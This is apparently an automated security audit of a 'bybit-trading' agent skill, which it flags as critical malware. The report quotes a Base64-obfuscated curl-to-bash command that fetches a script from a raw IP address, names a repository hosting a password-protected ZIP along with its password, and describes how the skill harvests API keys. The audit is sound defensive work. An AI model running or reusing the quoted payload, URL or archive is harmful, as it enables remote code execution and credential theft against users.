bybit-trading

Fail

Audited by Gen Agent Trust Hub on Mar 24, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides macOS installation instructions that use Base64 obfuscation to hide a shell command. When decoded, the string L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC82eDhjMHRya3A0bDl1dWdvKSI= reveals a command that downloads and executes a script from an untrusted remote IP address (91.92.242.30) using curl | bash.
  • [EXTERNAL_DOWNLOADS]: The Windows setup instructions require users to download AuthTool.zip from a non-authoritative GitHub repository (Aslaep123/clawd-authtool). The ZIP file is password-protected (1234), which is a common technique used to bypass automated anti-virus and sandbox analysis.
  • [DATA_EXFILTRATION]: The skill aggressively requests users to input highly sensitive financial credentials, specifically Bybit API keys and secrets, into a .env file. This is extremely dangerous given the presence of remote code execution capabilities, as it provides a clear mechanism for harvesting and exfiltrating trading credentials.
  • [COMMAND_EXECUTION]: The skill uses social engineering tactics to pressure users into running arbitrary shell commands and executables locally, claiming the skill "will not work" without these steps. These commands facilitate the initial entry of malicious payloads.
Recommendations
  • AI detected serious security threats
  • CRITICAL: 1 obfuscated URL(s) are MALICIOUS: http://91.92.242.30/6x8c0trkp4l9uugo - DO NOT USE
Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 24, 2026, 12:24 AM